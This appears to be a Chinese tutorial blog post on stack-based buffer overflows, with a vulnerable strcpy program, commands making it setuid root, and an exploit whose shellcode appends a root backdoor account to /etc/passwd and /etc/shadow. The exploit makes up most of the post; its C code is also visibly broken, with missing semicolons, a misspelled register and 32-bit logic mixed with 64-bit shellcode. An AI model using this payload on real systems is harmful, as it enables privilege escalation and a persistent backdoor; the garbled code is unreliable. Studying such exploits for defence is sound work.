2. 程式人生 > >基於堆棧的溢出

基於堆棧的溢出

阿新 發佈:2018-04-21
color argv info for ron return spa 奔潰 pan 

int main(int argv,char * argv[])
{
 char buffer[500];
 strcpy(buffer,argv[1]);
 return 0;           
}

這個程序接受一個500字節的緩沖區,而不管參數占用了多大空間。下面是這個程序的正常編譯和結果

技術分享圖片

除了錯誤地管理了存儲器外,實際上什麽也沒錯。現在,為了使程序真正的易受攻擊,必須將程序的所有權修改成root,並且必須為編譯後的文件打開suid權限位

sudo chown root vuln
sudo chmod +s vuln

下面是一段exploit代碼,創建一個緩沖區並將它註入一個易受攻擊的程序,希望在程序奔潰前,欺騙程序執行註入的shellcode。

  1 include<stdlib.h>
  2 #include<stdio.h>
  3 #include<string.h>
  4 #include<unistd.h>
  5 
  6 char shellcode[]=
  7                         /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 01204) */
  8              
  9                         "\x48\xbb\xff\xff\xff\xff\xff\x73\x77\x64
 
"       /* mov    $0x647773ffffffffff,%rbx */
 10                         "\x48\xc1\xeb\x28"                               /* shr    $0x28,%rbx */
 11                         "\x53"                                           /* push   %rbx */
 12                         "\x48\xbb\x2f\x65\x74\x63\x2f\x70\x61\x73
 
"       /* mov    $0x7361702f6374652f,%rbx */
 13                         "\x53"                                           /* push   %rbx */
 14                         "\x48\x89\xe7"                                   /* mov    %rsp,%rdi */
 15                         "\x66\xbe\x41\x04"                               /* mov    $0x441,%si */
 16                         "\x66\xba\x84\x02"                               /* mov    $0x284,%dx */
 17                         "\x48\x31\xc0"                                   /* xor    %rax,%rax */
 18                         "\xb0\x02"                                       /* mov    $0x2,%al */
 19                         "\x0f\x05"                                       /* syscall */
 20  
 21                         /* write(3, "shell-storm:x:0:0:shell-storm.or"..., 46) */
 22  
 23                         "\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03"       /* mov    $0x3ffffffffffffff,%rdi */
 24                         "\x48\xc1\xef\x38"                               /* shr    $0x38,%rdi */
 25                         "\x48\xbb\xff\xff\x2f\x62\x61\x73\x68\x0a"       /* mov    $0xa687361622fffff,%rbx */
 26                         "\x48\xc1\xeb\x10"                               /* shr    $0x10,%rbx */
 27                         "\x53"                                           /* push   %rbx */
 28                         "\x48\xbb\x67\x3a\x2f\x3a\x2f\x62\x69\x6e"       /* mov    $0x6e69622f3a2f3a67,%rbx */
 29                         "\x53"                                           /* push   %rbx */
 30                         "\x48\xbb\x73\x74\x6f\x72\x6d\x2e\x6f\x72"       /* mov    $0x726f2e6d726f7473,%rbx */
 31                         "\x53"                                           /* push   %rbx */
 32                         "\x48\xbb\x30\x3a\x73\x68\x65\x6c\x6c\x2d"       /* mov    $0x2d6c6c6568733a30,%rbx */
 33                         "\x53"                                           /* push   %rbx */
 34                         "\x48\xbb\x6f\x72\x6d\x3a\x78\x3a\x30\x3a"       /* mov    $0x3a303a783a6d726f,%rbx */
 35                         "\x53"                                           /* push   %rbx */
 36                         "\x48\xbb\x73\x68\x65\x6c\x6c\x2d\x73\x74"       /* mov    $0x74732d6c6c656873,%rbx */
 37                         "\x53"                                           /* push   %rbx */
 38                         "\x48\x89\xe6"                                   /* mov    %rsp,%rsi */
 39                         "\x48\xba\xff\xff\xff\xff\xff\xff\xff\x2e"       /* mov    $0x2effffffffffffff,%rdx */
 40                         "\x48\xc1\xea\x38"                               /* shr    $0x38,%rdx */
 41                         "\x48\x31\xc0"                                   /* xor    %rax,%rax */
 42                         "\xb0\x01"                                       /* mov    $0x1,%al */
 43                         "\x0f\x05"                                       /* syscall */
 44  
 45                         /* close(3) */
 46  
 47                         "\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03"       /* mov    $0x3ffffffffffffff,%rdi */
 48                         "\x48\xc1\xef\x38"                               /* shr    $0x38,%rdi */
 49                         "\x48\x31\xc0"                                   /* xor    %rax,%rax */
 50                         "\xb0\x03"                                       /* mov    $0x3,%al */
 51                         "\x0f\x05"                                       /* syscall */
 52  
 53                         /* Xor */
 54  
 55                         "\x48\x31\xdb"                                   /* xor    %rbx,%rbx */
 56                         "\x48\x31\xff"                                   /* xor    %rdi,%rdi */
 57                         "\x48\x31\xf6"                                   /* xor    %rsi,%rsi */
 58                         "\x48\x31\xd2"                                   /* xor    %rdx,%rdx */
 59  
 60                         /* open("/etc/shadow", O_WRONLY|O_CREAT|O_APPEND, 01204) */
 61  
 62                         "\x48\xbb\xff\xff\xff\xff\xff\x64\x6f\x77"       /* mov    $0x776f64ffffffffff,%rbx */
 63                         "\x48\xc1\xeb\x28"                               /* shr    $0x28,%rbx */
 64                         "\x53"                                           /* push   %rbx */
 65                         "\x48\xbb\x2f\x65\x74\x63\x2f\x73\x68\x61"       /* mov    $0x6168732f6374652f,%rbx  */
 66                         "\x53"                                           /* push   %rbx */
 67                         "\x48\x89\xe7"                                   /* mov    %rsp,%rdi */
 68                         "\x66\xbe\x41\x04"                               /* mov    $0x441,%si */
 69                         "\x66\xba\x84\x02"                               /* mov    $0x284,%dx */
 70                         "\x48\x31\xc0"                                   /* xor    %rax,%rax */
 71                         "\xb0\x02"                                       /* mov    $0x2,%al */
 72                         "\x0f\x05"                                       /* syscall *
 73  
 74                         /* write(3, "shell-storm:$1$reWE7GM1$axeMg6LT"..., 59) */
 75              
 76                         "\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03"       /* mov    $0x3ffffffffffffff,%rdi */
 77                         "\x48\xc1\xef\x38"                               /* shr    $0x38,%rdi */
 78                         "\x48\xbb\xff\xff\xff\xff\xff\x3a\x3a\x0a"       /* mov    $0xa3a3affffffffff,%rbx */
 79                         "\x48\xc1\xeb\x28"                               /* shr    $0x28,%rbx */
 80                         "\x53"                                           /* push   %rbx */
 81                         "\x48\xbb\x34\x37\x37\x38\x3a\x3a\x3a\x3a"       /* mov    $0x3a3a3a3a38373734,%rbx */
 82                         "\x53"                                           /* push   %rbx */
 83                         "\x48\xbb\x5a\x30\x55\x33\x4d\x2f\x3a\x31"       /* mov    $0x313a2f4d3355305a,%rbx */
 84                         "\x53"                                           /* push   %rbx */
 85                         "\x48\xbb\x73\x2f\x50\x64\x53\x67\x63\x46"       /* mov    $0x4663675364502f73,%rbx */
 86                         "\x53"                                           /* push   %rbx */
 87                         "\x48\xbb\x61\x78\x65\x4d\x67\x36\x4c\x54"       /* mov    $0x544c36674d657861,%rbx */
 88                         "\x53"                                           /* push   %rbx */
 89                         "\x48\xbb\x65\x57\x45\x37\x47\x4d\x31\x24"       /* mov    $0x24314d4737455765,%rbx */
 90                         "\x53"                                           /* push   %rbx */
 91                         "\x48\xbb\x6f\x72\x6d\x3a\x24\x31\x24\x72"       /* mov    $0x722431243a6d726f,%rbx  */
 92                         "\x53"                                           /* push   %rbx */
 93                         "\x48\xbb\x73\x68\x65\x6c\x6c\x2d\x73\x74"       /* mov    $0x74732d6c6c656873,%rbx */
 94                         "\x53"                                           /* push   %rbx */
 95                         "\x48\x89\xe6"                                   /* mov    %rsp,%rsi */
 96                         "\x48\xba\xff\xff\xff\xff\xff\xff\xff\x3b"       /* mov    $0x3bffffffffffffff,%rdx */
 97                         "\x48\xc1\xea\x38"                               /* shr    $0x38,%rdx */
 98                         "\x48\x31\xc0"                                   /* xor    %rax,%rax */
 99                         "\xb0\x01"                                       /* mov    $0x1,%al */
100                         "\x0f\x05"                                       /* syscall */     
101  
102                         /* close(3) */
103  
104                         "\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03"       /* mov    $0x3ffffffffffffff,%rdi */
105                         "\x48\xc1\xef\x38"                               /* shr    $0x38,%rdi */
106                         "\x48\x31\xc0"                                   /* xor    %rax,%rax */
107                         "\xb0\x03"                                       /* mov    $0x3,%al */
108                         "\x0f\x05"                                       /* syscall */
109  
110                         /* _exit(0) */
111  
112                         "\x48\x31\xff"                                   /* xor    %rdi,%rdi */
113                         "\x48\x31\xc0"                                   /* xor    %rax,%rax */
114                         "\xb0\x3c"                                       /* mov    $0x3c,%al */
115                         "\x0f\x05";                                      /* syscall */
116 
117 
118 unsigned long sp(void)
119 {
120 __asm__("movl %esp,%eas") //用於返回堆棧指針
121 }
122  
123 int main(int argc,char * argv[])
124 {
125 int i,offset //offset 偏移量
126 long esp,ret,*addr_ptr
127 char *buffer,*ptr
128 offset=0; // 使用0偏移量
129 esp=sp(); //將當前堆棧指針放入ESP 
130 ret=esp-offset //我們要覆蓋RET地址
131 
132 buffer=malloc(600) //600字節緩沖區 
133 //用RET地址填充整個緩沖區 
134 ptr=buffer;
135 addr_ptr=(long *)ptr;
136 for(i=0;i<600;i+=4)
137     *(addr_ptr++)=ret;
138 //用NOP指令填充前200字節
139 for(i=0;i<200;i++)
140     buffer[i]=\x90;
141 //把shellCode放在NOP後面
142 ptr=buffer+200;
143 for(i=0;i<strlen(shellcode);i++)
144 *(ptr++)=shellcode[i];
145 buffer[600-1]=0;
146 execl("./vuln",vuln,buffer,0);
147 free(buffer);
148 return 0
149 }

下面是這個程序的執行結果

技術分享圖片

基於堆棧的溢出

相關推薦

STM32/GD32上內存探測研究

研究 spa 重疊 ima 異常 cnblogs 指針 rtos 否則 無數次遭受堆棧溢出折磨,隨著系統變得復雜,故障點越來越難以查找!主要溢出情況如下:1,一般RAM最後兩塊空間是堆Heap和棧Stack,堆從下往上用,棧從上往下用,任意一個用完,都會進入對方的空間2,如

遞歸代碼在數組列表偏大的情況下會導致。一個解決辦法

都沒有 list() 通過 func roc timeout pro 解決辦法 棧溢出 var list = readHugeList(); var nextListItem = function() { var item = list.pop();

VS2013 調查(0xC00000FD: Stack overflow)

技術 棧大小 所在 過程 appid 數據 網上 microsoft app 在調試一個代碼時,執行過程中會出現如下錯誤(0xC00000FD: Stack overflow)。 很明顯是堆棧溢出了。 網上很多方法,都是通過修改設置工程配置,把堆棧調大一些,如下圖。 但

基於

color argv info for ron return spa 奔潰 pan int main(int argv,char * argv[]) { char buffer[500]; strcpy(buffer,argv[1]); return 0;

線程與線程屬性

數據 int 地址 這不 log thread 空間 bsp tail http://blog.csdn.net/qq_27231343/article/details/52562196 那麽過多的遞歸調用為什麽會引起棧溢出呢?事實上,函數調用的參數是通過棧空間來傳遞的

apps fig plugins rms xmx gin catalina data clip 項目右鍵 run run configuration-Dcatalina.base="E:\eclipse_workspace2\.metadata\.plugins\org

筆記1.9 認識SEH

關閉 ont tps 字符 查看 lis vs2008 windows -a 從本節開始,我們就要研究一些略微高級點的話題了,如同在1.2節中看到的,Windows中為抵抗棧溢出做了非常多保護性的檢查工作,編譯的程序默認開啟了這些保護。假設我們不能繞過這

關於c++的問題

溢出 嵌套 提示 數據 析構函數 node 空間 http ima 我自己定義了一個數據類型node,嵌套在另一個數據類型當中時候,用到了delete函數, 在我node的聲明當中聲明了幾個指針   在我的析構函數中卻調用了delet函數 結果程序結果是能跑

Vivotek 攝像頭遠程漏洞分析及利用

-418 環境搭建 目標 bin 無法 查看 攝像 遠程調試 鏡像 Vivotek 攝像頭遠程棧溢出漏洞分析及利用 近日,Vivotek 旗下多款攝像頭被曝出遠程未授權棧溢出漏洞,攻擊者發送特定數據可導致攝像頭進程崩潰。 漏洞作者@bashis 放出了可造成攝像頭 Cras

盜墓筆記—阿裏旺旺ActiveX控件imageMan.dll漏洞研究

baidu 一個 參數 variant dispatch 旺旺 unsigned def ssi 本文作者:i春秋作家——cq5f7a075d 也許現在還研究Activex就是挖墳,但是呢,筆者是摸金校尉,挖墳,呸!盜墓是筆者的本職工作。 額,不扯了,本次研究的是阿裏旺

通過尾遞歸避免

use asc 避免 由於 pre javascrip sta 溢出 down JavaScript中的遞歸即函數內調用函數自身,但遞歸是非常耗內存的,每一次調用都會分配一定的棧空間,達到一定的數量(具體看瀏覽器)便會溢出報錯。 function recursion (nu

20155306 白皎 0day漏洞——漏洞利用原理之利用

put strong 3.2 base 十六進制 格式 correct 3.5 3.1 20155306 白皎 0day漏洞——漏洞利用原理之棧溢出利用 一、系統棧的工作原理 1.1內存的用途 根據不同的操作系統,一個進程可能被分配到不同的內存區域去執行。但是不管什麽樣的操

Android內核漏洞利用技術實戰:環境搭建&實戰

fin vmlinux ant eas turn git static gin qemu 前言 Android的內核采用的是 Linux 內核,所以在Android內核中進行漏洞利用其實和在 一般的 x86平臺下的 linux 內核中進行利用差不多。主要區別在於 Andro

【匯編雜項】關於_高級語言中 數組越界與匯編中 的_聯系的思考

edi bits 關註 學習 type 控制 方便 設計 滿足 數組越界     數組越界,是剛開始學習編程時,就不斷被別人提醒的一個點,“相當可怕”。獲取不合理數值,造成程序異常or操作計算機重要內存,造成威脅。。。原因是什麽呢?數組在匯

解決

錯誤 nts code test inf throw 技術 system ~~ 遞歸調用,棧深度。 錯誤原因: java.lang.StackOverflowError 棧內存溢出 棧溢出 產生於遞歸調用,循環遍歷是不會的,但是循環方法裏面產生遞歸調用, 也會發生棧溢出。

關於 [後jmp esp執行shellcode] 原理分析

blog 用戶 spa 相對 分布圖 原理 寄存器 最終 連續 原文地址:https://blog.csdn.net/lixiangminghate/article/details/53333710 正常情況下,函數棧分布圖如下: 即,返回地址被改為一段緩存區的地址。當函

PWN菜雞入門之函數調用的聯系

sof cccccc ebp main函數 程序 spa last lock 實例 一、函數調用棧過程總結 Fig 1. 函數調用發生和結束時調用棧的變化 Fig 2. 將被調用函數的參數壓入棧內 Fig 3. 將被調用函數的返回地址壓入棧內 Fig

PWN菜雞入門之(1)

使用 per pri binary 內容 _cdecl com bubuko 應該 棧溢出 一、基本概念: 函數調用棧情況見鏈接 基本準備: bss段可執行檢測: ?   gef? b main Breakpoint 1 at 0

PWN菜雞入門之 (2)—— ret2libc與動態鏈接庫的關系

行數 break 思路 off 發現 x11 代碼段 之間 .net 準備知識引用自https://www.freebuf.com/articles/rookie/182894.html 0×01 利用思路 ret2libc 這種攻擊方式主要是針對 動

今天遇到一個關於的問題StackOverflowError

實體類 技術 lower err 其中 .com 問題 return alt 關於這個問題個人認為是一個比較棘手的問題,因為我們每個人遇到溢出問題的原因都不一樣,所以遇到這樣的問題就多從問題的根本入手。   我遇到的原因是,循環多次導致的,以為我的倆個互相關聯的實體類,當作